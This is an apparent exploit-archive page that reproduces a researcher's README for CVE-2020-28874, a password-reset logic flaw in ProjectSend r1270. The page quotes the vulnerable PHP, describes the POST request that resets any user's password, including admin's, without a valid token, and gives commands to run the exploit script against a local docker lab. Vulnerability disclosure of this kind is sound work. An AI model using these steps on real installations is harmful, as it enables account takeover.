Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2020-28874 PoC — ProjectSend 安全漏洞

Source
https://github.com/varandinawer/CVE-2020-28874
Associated Vulnerability
Title:ProjectSend 安全漏洞 (CVE-2020-28874)
Description:reset-password.php in ProjectSend before r1295 allows remote attackers to reset a password because of incorrect business logic. Errors are not properly considered (an invalid token parameter).
Description
CVE-2020-28874
Readme
This repository contains the description of the vulnerability found (CVE-2020-28874) in [ProjectSend](https://www.projectsend.org/yes) r1270 release. 

Thank you to my colleagues from  Entelgy Innotec Security for pushing me to improve!

# CVE-2020-28874: Privilege Escalation
## Description
The vulnerability is in the reset password component, an attacker can change the password of any known user by his username, such as admin, without a valid token.

This is possible because the backend does not clean the $user_data with the user data loaded from the username provided.
```php
 if (!empty($_GET['token']) && !empty($_GET['user'])) {
        $got_token	= $_GET['token'];
        $got_user	= $_GET['user'];

        /**
         * Get the user's id
         */
        $user_data = get_user_by_username($got_user);
        ....
        }
```
And use the state of that variable to continue the process to reset the password.

```php
    if ($_POST) {
        /**
         * Clean the posted form values.
         */
        $form_type = encode_html($_POST['form_type']);
        
        switch ($form_type) {
        ----
            case 'new_password':
                if (!empty($user_data['id'])) {
                    $reset_password_new = $_POST['password'];
                    ...
                }
        ...
        }
```
### Attack
To do that, the attacker needs to craft a POST request, with an invalid parameter "token" and the "user" parameter with the target username in the query string, also need to add the “form_type” as “new_password”, “password” with the desire new password, the csrf_token with a valid one (from the login form, the reset password form does not provide that) in the body part.

In this repository, you can find a python script to exploit the vulnerability and a docker container to test it. 
#### Usage
```sh
git clone https://github.com/varandinawer/CVE-2020-28874_CVE-2020-28875.git
cd ./CVE-2020-28874_CVE-2020-28875/docker-r1270
docker-compose up 
#To finish the process of ProjectSend installation, go to http://localhost in the browser and follow the indication to setup an admin account
cd .. 
python CVE-2020-28874.py --url http://localhost --user admin --pwd newAdminP4ssword*
```
## Fix
Upgrade to version [r1295](https://www.projectsend.org/change-log/) or more.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →